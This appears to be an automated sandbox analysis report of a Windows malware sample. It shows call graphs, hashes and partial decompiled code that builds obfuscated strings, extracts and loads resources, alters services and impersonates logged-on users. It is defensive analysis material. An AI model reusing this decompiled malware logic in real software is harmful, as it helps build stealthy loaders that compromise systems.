                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1632413811-0
                                                                                                                                                                                                                                    • Opcode ID: 6300f0afedfeefbf152cdbd476823687cc3dc72d940d4f9bfd35073cdaa893f0
                                                                                                                                                                                                                                    • Instruction ID: ac546e27124c6d4ceb5f486de7146ead2585a12044a75ab3de05bcaebaaa79ff
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6300f0afedfeefbf152cdbd476823687cc3dc72d940d4f9bfd35073cdaa893f0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F0A5705183018FDB59AF34EE4A6087BA1FF16331B95061BF46286AF1CF3A95D9CB21
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                                                    callgraph 0 Function_00007FFBACED0198 1 Function_00007FFBACED01D8 1->0 1->1 10 Function_00007FFBACED01C8 1->10 24 Function_00007FFBACED01B8 1->24 32 Function_00007FFBACED01E8 1->32 33 Function_00007FFBACED01A8 1->33 2 Function_00007FFBACED0158 28 Function_00007FFBACED102C 2->28 3 Function_00007FFBACED0118 4 Function_00007FFBACED1B10 12 Function_00007FFBACED2049 4->12 5 Function_00007FFBACED0710 22 Function_00007FFBACED0138 5->22 6 Function_00007FFBACED0E52 6->28 7 Function_00007FFBACED1188 7->3 7->5 8 Function_00007FFBACED0108 7->8 35 Function_00007FFBACED0128 7->35 9 Function_00007FFBACED0148 9->28 10->0 10->1 10->10 10->24 10->32 10->33 11 Function_00007FFBACED0188 13 Function_00007FFBACED108A 14 Function_00007FFBACED190A 14->2 14->3 14->9 14->11 23 Function_00007FFBACED0178 14->23 15 Function_00007FFBACED214A 25 Function_00007FFBACED223A 15->25 16 Function_00007FFBACED000A 17 Function_00007FFBACED06CA 18 Function_00007FFBACED0E02 19 Function_00007FFBACED077D 31 Function_00007FFBACED0A2E 19->31 20 Function_00007FFBACED0A7E 20->2 20->3 20->9 34 Function_00007FFBACED0168 20->34 21 Function_00007FFBACED1838 21->3 21->8 21->35 24->0 24->1 24->10 24->24 24->32 24->33 26 Function_00007FFBACED2273 27 Function_00007FFBACED0C34 27->18 29 Function_00007FFBACED06ED 29->22 30 Function_00007FFBACED0B2D 32->0 32->1 32->10 32->24 32->32 32->33 36 Function_00007FFBACED1760 37 Function_00007FFBACED1262 38 Function_00007FFBACED1A1D

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00007FFBACED1B10 Relevance: 2.0, APIs: 1, Instructions: 548COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 17 7ffbaced1b10-7ffbaced1b17 18 7ffbaced1b19-7ffbaced1b21 17->18 19 7ffbaced1b22-7ffbaced1bd8 17->19 18->19 23 7ffbaced1bda-7ffbaced1be9 19->23 24 7ffbaced1c36-7ffbaced1c68 19->24 23->24 25 7ffbaced1beb-7ffbaced1bee 23->25 29 7ffbaced1cc7-7ffbaced1d00 24->29 30 7ffbaced1c6a-7ffbaced1c7a 24->30 27 7ffbaced1c28-7ffbaced1c30 25->27 28 7ffbaced1bf0-7ffbaced1c03 25->28 27->24 31 7ffbaced1c07-7ffbaced1c1a 28->31 32 7ffbaced1c05 28->32 40 7ffbaced1d02-7ffbaced1d11 29->40 41 7ffbaced1d5e-7ffbaced1d97 29->41 30->29 33 7ffbaced1c7c-7ffbaced1c7f 30->33 31->31 34 7ffbaced1c1c-7ffbaced1c24 31->34 32->31 35 7ffbaced1cb9-7ffbaced1cc1 33->35 36 7ffbaced1c81-7ffbaced1c94 33->36 34->27 35->29 38 7ffbaced1c98-7ffbaced1cab 36->38 39 7ffbaced1c96 36->39 38->38 42 7ffbaced1cad-7ffbaced1cb5 38->42 39->38 40->41 43 7ffbaced1d13-7ffbaced1d16 40->43 49 7ffbaced1d99-7ffbaced1da9 41->49 50 7ffbaced1df6-7ffbaced1e2f 41->50 42->35 45 7ffbaced1d18-7ffbaced1d2b 43->45 46 7ffbaced1d50-7ffbaced1d58 43->46 47 7ffbaced1d2f-7ffbaced1d42 45->47 48 7ffbaced1d2d 45->48 46->41 47->47 51 7ffbaced1d44-7ffbaced1d4c 47->51 48->47 49->50 52 7ffbaced1dab-7ffbaced1dae 49->52 56 7ffbaced1e31-7ffbaced1e41 50->56 57 7ffbaced1e8e-7ffbaced1ec7 50->57 51->46 54 7ffbaced1de8-7ffbaced1df0 52->54 55 7ffbaced1db0-7ffbaced1dc3 52->55 54->50 58 7ffbaced1dc7-7ffbaced1dda 55->58 59 7ffbaced1dc5 55->59 56->57 60 7ffbaced1e43-7ffbaced1e46 56->60 67 7ffbaced1ec9-7ffbaced1ed9 57->67 68 7ffbaced1f26-7ffbaced1fe2 ChangeServiceConfigA 57->68 58->58 61 7ffbaced1ddc-7ffbaced1de4 58->61 59->58 62 7ffbaced1e48-7ffbaced1e5b 60->62 63 7ffbaced1e80-7ffbaced1e88 60->63 61->54 65 7ffbaced1e5f-7ffbaced1e72 62->65 66 7ffbaced1e5d 62->66 63->57 65->65 69 7ffbaced1e74-7ffbaced1e7c 65->69 66->65 67->68 70 7ffbaced1edb-7ffbaced1ede 67->70 74 7ffbaced1fea-7ffbaced1ffc call 7ffbaced2049 68->74 75 7ffbaced1fe4 68->75 69->63 72 7ffbaced1f18-7ffbaced1f20 70->72 73 7ffbaced1ee0-7ffbaced1ef3 70->73 72->68 76 7ffbaced1ef7-7ffbaced1f0a 73->76 77 7ffbaced1ef5 73->77 80 7ffbaced2001-7ffbaced202d 74->80 75->74 76->76 78 7ffbaced1f0c-7ffbaced1f14 76->78 77->76 78->72 81 7ffbaced2034-7ffbaced2048 80->81 82 7ffbaced202f 80->82 82->81
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ChangeConfigService
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3849694230-0
                                                                                                                                                                                                                                    • Opcode ID: c95da83ad16d07d7414b115e1b40eae2c5d42bba4691ae8fe63d3367b28dd64d
                                                                                                                                                                                                                                    • Instruction ID: 8aaaae0aae91af442c1d3a56d7ea74af29a0d4bd9727492a9e175be73befba0a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c95da83ad16d07d7414b115e1b40eae2c5d42bba4691ae8fe63d3367b28dd64d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DF1D3B0918A4D4FEB69DF28D80A7F977D1FB58311F10426EEC4EC7291DE74A5818B82
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00007FFBACED077D Relevance: 1.8, APIs: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: NameUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                                                                                                                    • Opcode ID: 70ae7f8500dc03e2715057726138bed1e953225e740355331f34a9520e5be93b
                                                                                                                                                                                                                                    • Instruction ID: b5f1104a25b7dc0ad81220b3f89939c649b7278db6364332a45adabd11bdee45
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70ae7f8500dc03e2715057726138bed1e953225e740355331f34a9520e5be93b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE918070A08A4D8FEB69DF28C8597E977D1FF54310F04416EE84EC7292DE75A981CB81
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00007FFBACED0C34 Relevance: 1.7, APIs: 1, Instructions: 213serviceCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 117 7ffbaced0c34-7ffbaced0c3b 118 7ffbaced0c46-7ffbaced0ce5 117->118 119 7ffbaced0c3d-7ffbaced0c45 117->119 123 7ffbaced0ce7-7ffbaced0cf6 118->123 124 7ffbaced0d40-7ffbaced0daa OpenServiceA 118->124 119->118 123->124 125 7ffbaced0cf8-7ffbaced0cfb 123->125 131 7ffbaced0db2-7ffbaced0de6 call 7ffbaced0e02 124->131 132 7ffbaced0dac 124->132 127 7ffbaced0d35-7ffbaced0d3d 125->127 128 7ffbaced0cfd-7ffbaced0d10 125->128 127->124 129 7ffbaced0d14-7ffbaced0d27 128->129 130 7ffbaced0d12 128->130 129->129 133 7ffbaced0d29-7ffbaced0d31 129->133 130->129 136 7ffbaced0de8 131->136 137 7ffbaced0ded-7ffbaced0e01 131->137 132->131 133->127 136->137
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: OpenService
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3098006287-0
                                                                                                                                                                                                                                    • Opcode ID: f962d0c1bdacf0bade3e214b87019a56398ace11f7e244d69e912097a552c6ef
                                                                                                                                                                                                                                    • Instruction ID: 179620df93f24f58f826232ab9bc19939a5b25f4502add69a5a227985a404830
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f962d0c1bdacf0bade3e214b87019a56398ace11f7e244d69e912097a552c6ef
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1551C670508A4D4FEB59EF28D85A7F977D1FB59311F14412EE84EC3292DE74E8418B82
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00007FFBACED0B2D Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 138 7ffbaced0b2d-7ffbaced0bb8 143 7ffbaced0bba-7ffbaced0bbf 138->143 144 7ffbaced0bc2-7ffbaced0bc7 138->144 143->144 145 7ffbaced0bc9-7ffbaced0bce 144->145 146 7ffbaced0bd1-7ffbaced0c08 OpenSCManagerW 144->146 145->146 147 7ffbaced0c0a 146->147 148 7ffbaced0c10-7ffbaced0c2d 146->148 147->148
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ManagerOpen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1889721586-0
                                                                                                                                                                                                                                    • Opcode ID: dfaa01a1a40dc219666d9f0d7bbfa13cf811511bbdf73dd116c178c6bfa4281d
                                                                                                                                                                                                                                    • Instruction ID: cdf99c6211c14e574ca93fd8c2373a4aa178e0bc6bdba18b68d3ab2deecbe064
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfaa01a1a40dc219666d9f0d7bbfa13cf811511bbdf73dd116c178c6bfa4281d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8131A07190CB588FDB29DF98D8596F9BBE0EB69311F04816FD04ED3252CA70A445CB81
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00007FFBACED1A1D Relevance: 1.6, APIs: 1, Instructions: 122serviceCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 149 7ffbaced1a1d-7ffbaced1a25 150 7ffbaced1a27 149->150 151 7ffbaced1a28-7ffbaced1ad9 ControlService 149->151 150->151 155 7ffbaced1ae1-7ffbaced1b09 151->155 156 7ffbaced1adb 151->156 156->155
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ControlService
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 253159669-0
                                                                                                                                                                                                                                    • Opcode ID: 46526fecdf6471a19d1f640478a9c251d9da39fbd0951ca57292f1f5addfcb49
                                                                                                                                                                                                                                    • Instruction ID: d6a03f1c206d50ae840314fe064a883dc5392ded1ccecd2c7b31fa13225d0854
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46526fecdf6471a19d1f640478a9c251d9da39fbd0951ca57292f1f5addfcb49
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31D57190CB588FDB18DF9CD845AF97BE0EF55321F04416EE08AD3252CB64A806CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00007FFBACED108A Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 157 7ffbaced108a-7ffbaced10b3 158 7ffbaced10b5-7ffbaced10bd 157->158 159 7ffbaced10be-7ffbaced1152 FindCloseChangeNotification 157->159 158->159 163 7ffbaced115a-7ffbaced1181 159->163 164 7ffbaced1154 159->164 164->163
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                                                    • Opcode ID: fc51c391e89a500386ebbdbb19ec6df2dcdca8f6f93fba60c3edc62367c01404
                                                                                                                                                                                                                                    • Instruction ID: e862793d21a49e4c8f3dacb8956e190962960af8d39182561610c13d3d078139
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc51c391e89a500386ebbdbb19ec6df2dcdca8f6f93fba60c3edc62367c01404
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F231267090C78C8FDB0ADB6888157E97FF0EF56320F04429FD089D31A2DA65A856CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00007FFBACED1760 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 165 7ffbaced1760-7ffbaced1767 166 7ffbaced1769-7ffbaced1771 165->166 167 7ffbaced1772-7ffbaced17c5 165->167 166->167 170 7ffbaced17cd-7ffbaced1802 ImpersonateLoggedOnUser 167->170 171 7ffbaced180a-7ffbaced1831 170->171 172 7ffbaced1804 170->172 172->171
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2216092060-0
                                                                                                                                                                                                                                    • Opcode ID: dd03fd0b8cb037eef1a18dc5867e652e1c42109d6e42a7f95e36c1db9c9e515d
                                                                                                                                                                                                                                    • Instruction ID: 028150e99ef44b6472ceb7c3ae661ac902f599a88fe041f71bb961eba0ba3889
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd03fd0b8cb037eef1a18dc5867e652e1c42109d6e42a7f95e36c1db9c9e515d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D31D47190CA4C8FDB59DFA8D845BF9BBE0EF56321F00422ED049D3192DB74A856CB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00007FFBACED0108 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 173 7ffbaced0108-7ffbaced0114 175 7ffbaced0116 173->175 176 7ffbaced012b-7ffbaced1802 ImpersonateLoggedOnUser 173->176 175->176 180 7ffbaced180a-7ffbaced1831 176->180 181 7ffbaced1804 176->181 181->180
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 52e5fe74a53674f8ab9a26a52ddec63c93de3706f04596103a4feeac2888c073
                                                                                                                                                                                                                                    • Instruction ID: baa37121740277f58f860b8da16117ad1e2d3bbab3dc7146ae4286790a8cfa4e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52e5fe74a53674f8ab9a26a52ddec63c93de3706f04596103a4feeac2888c073
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2021B17190CA1C8FDB59DFA8D8497F9BBE0FB55321F00412ED04DD3152DB64A856CB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 004019F0 Relevance: 147.7, APIs: 34, Strings: 50, Instructions: 747comprocessCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 41 401f1c-401f2f 31->41 42 401f5f-401f69 31->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 46 401ce2-401cea 38->46 39->40 40->25 47 401cf9-401d09 Module32Next 40->47 43 401f33-401f5d call 401560 41->43 44 401f73-401f75 42->44 45 401f6b-401f72 42->45 43->42 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->32 46->39 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 61 401d30-401d34 55->61 62 401d50-401d52 61->62 63 401d36-401d38 61->63 67 401d55-401d57 62->67 65 401d3a-401d40 63->65 66 401d4c-401d4e 63->66 65->62 69 401d42-401d4a 65->69 66->67 67->25 70 401d5d-401d7b call 401650 67->70 69->61 69->66 77 401d80-401d84 70->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 87 401d92-401d9a 82->87 83->84 84->25 85 401dad-401dbd Module32Next 84->85 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->83 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 94 402482-402487 93->94 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 SafeArrayDestroy 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 SafeArrayCreateVector 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                    			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
